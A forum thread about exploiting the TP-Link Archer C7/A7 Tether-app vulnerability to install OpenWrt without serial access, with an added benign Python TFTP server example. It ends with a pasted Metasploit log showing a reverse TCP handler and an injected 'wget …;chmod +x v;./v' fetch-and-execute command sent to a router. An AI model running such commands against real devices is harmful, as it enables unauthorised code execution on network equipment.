Possible alternative installation of OpenWrt on TP-Link devices without UART - gain code execution on a TP-Link Archer A7

My question is: through this vulnerability, is it possible to install OpenWrt on devices not compatible with the standard installation? I am not quite prepared to create the whole command byte by byte and subsequently automate the installation, but I believe it is possible on all TP-Link devices controllable with the "TP-Link Tether" app.
This link has the procedure: https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo

According to https://git.openwrt.org/?p=openwrt/openwrt.git;a=commitdiff;h=1e4ee63cc8d1889a78b539a5ed7be8d56e9b976f, the Archer A7 can be flashed via TFTP.

Yes, I know that the C7 is compatible without UART; the C7 was used as an example to exploit the vulnerability in the function TP-Link SOHO router <<>> TP-Link Tether app. I was referring to other models on which OpenWrt can only be installed with UART; exploiting this vulnerability, it is possible to install OpenWrt without UART.

Errm, the Archer A7 has a working push-button TFTP recovery option, which can be used to install OpenWrt. All you need is a TFTP server on your computer and a paper clip; you neither need to open the case nor use serial access. Why on earth would you go a more complicated way to find an exploit, if the front door is wide open?

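To show what the "TFTP server on your computer" in the push-button recovery path actually has to do, here is an added example (not code from this thread or from the OpenWrt project): a minimal read-only TFTP server in Python that answers one read request with 512-byte DATA blocks and stop-and-wait ACKs, as in RFC 1350, plus a tiny client standing in for the router's bootloader so the transfer can be checked on loopback. The image name `recovery.bin` and the use of one socket for request and transfer are assumptions made for the example; the file name and server IP a given TP-Link bootloader expects come from that device's OpenWrt wiki page, not from this code.

```python
import socket
import struct
import threading

# TFTP opcodes (RFC 1350) and the fixed data block size.
OP_RRQ, OP_DATA, OP_ACK, OP_ERROR = 1, 3, 4, 5
BLOCK = 512


def parse_rrq(pkt):
    """Parse a read request: opcode(2) filename NUL mode NUL. Returns (name, mode) or None."""
    if len(pkt) < 4 or struct.unpack('!H', pkt[:2])[0] != OP_RRQ:
        return None
    parts = pkt[2:].split(b'\0')
    if len(parts) < 3:
        return None
    return parts[0].decode('ascii', 'replace'), parts[1].decode('ascii', 'replace').lower()


def data_packets(payload):
    """Yield (block_number, packet). The last packet carries fewer than 512 bytes
    (possibly zero), which is how TFTP signals end of file."""
    n, offset = 0, 0
    while True:
        chunk = payload[offset:offset + BLOCK]
        n += 1
        yield n, struct.pack('!HH', OP_DATA, n & 0xFFFF) + chunk
        offset += BLOCK
        if len(chunk) < BLOCK:
            return


def error_packet(code, msg):
    return struct.pack('!HH', OP_ERROR, code) + msg.encode() + b'\0'


def serve_one(sock, images, timeout=5.0, retries=3):
    """Answer a single RRQ on a bound UDP socket. `images` maps file name -> bytes.
    Returns the number of payload bytes sent, or -1 for an unknown file or a stalled client."""
    sock.settimeout(timeout)
    pkt, peer = sock.recvfrom(1024)
    req = parse_rrq(pkt)
    if req is None or req[0] not in images:
        sock.sendto(error_packet(1, 'File not found'), peer)
        return -1
    sent = 0
    for blk, data in data_packets(images[req[0]]):
        for _ in range(retries):          # resend the block until its ACK arrives
            sock.sendto(data, peer)
            try:
                ack, _ = sock.recvfrom(1024)
            except socket.timeout:
                continue
            if len(ack) >= 4 and struct.unpack('!HH', ack[:4]) == (OP_ACK, blk & 0xFFFF):
                break
        else:
            return -1                     # client never acknowledged this block
        sent += len(data) - 4
    return sent


def fetch(server_addr, name, timeout=5.0):
    """Minimal TFTP client (octet mode) playing the bootloader's role. Returns the
    file bytes, or None if the server answered with an ERROR packet."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(struct.pack('!H', OP_RRQ) + name.encode() + b'\0octet\0', server_addr)
    out, expected = bytearray(), 1
    try:
        while True:
            pkt, peer = sock.recvfrom(4 + BLOCK)
            op, blk = struct.unpack('!HH', pkt[:4])
            if op == OP_ERROR:
                return None
            if op == OP_DATA and blk == expected & 0xFFFF:
                out += pkt[4:]
                sock.sendto(struct.pack('!HH', OP_ACK, blk), peer)  # ACK goes to the sender's port
                if len(pkt) - 4 < BLOCK:
                    return bytes(out)
                expected += 1
    finally:
        sock.close()


def demo_roundtrip(payload, request='recovery.bin'):
    """Serve a constructed image on loopback and fetch it; returns (received, bytes_sent)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(('127.0.0.1', 0))
    result = {}
    t = threading.Thread(target=lambda: result.update(sent=serve_one(srv, {'recovery.bin': payload})))
    t.start()
    got = fetch(srv.getsockname(), request)
    t.join()
    srv.close()
    return got, result['sent']


if __name__ == '__main__':
    received, sent = demo_roundtrip(b'\x00' * 1500)   # constructed stand-in for a firmware image
    print('transferred', sent, 'bytes, intact:', received == b'\x00' * 1500)
```

The transfer ends only when a short (or empty) DATA block is acknowledged, so a payload that is an exact multiple of 512 bytes still gets a final zero-length block; a request for a name the server does not hold gets a TFTP ERROR instead of silence, which is the behaviour you want when checking why a recovery attempt stalls.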

I would like to install OpenWrt on a D50; no one was able to flash it without UART. Also any other TP-Links that do not support the standard installation.
I tried to rename the topic because it's misleading, but it doesn't let me edit it.

Then why are you asking about the archer a7, if you actually want to know about the D50…

Yes, security issues might be possible to exploit for gaining root access - that doesn't mean there's a three-step guide to profit.

The D50 times out; maybe it's not vulnerable. Anyway, I think it works on many TP-Links, not just the A7.

[*] Started reverse TCP handler on 172.16.16.68:4444 
[*] Attempting to exploit TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)    (MY D50 TPLINK)
[*] Starting up our web service on http://172.16.16.68:8080 ...
[*] Using URL: http://172.16.16.68:8080/v
[*] 172.16.16.100:20002 - Connecting to the target
[*] 172.16.16.100:20002 - Sending command file byte by byte
[*] 172.16.16.100:20002 - Command: wget http://172.16.16.68:8080/v;chmod +x v;./v
[*] 172.16.16.100:20002 - [0%]= = => - - - - - - - - - - - - - - - -[100%]
[*] 172.16.16.100:20002 - [0%]= = = = = = => - - - - - - - - - - - -[100%]
[*] 172.16.16.100:20002 - [0%]= = = = = = = = = = => - - - - - - - -[100%]
[*] 172.16.16.100:20002 - [0%]= = = = = = = = = = = = = = => - - - -[100%]
[*] 172.16.16.100:20002 - [0%]= = = = = = = = = = = = = = = = = = =>[100%]
[*] 172.16.16.100:20002 - Command file sent, attempting to execute...
[-] Exploit aborted due to failure: unknown: 172.16.16.100:20002 - Timeout reached! Payload was not downloaded :(
[*] Server stopped.
[*] Exploit completed, but no session was created.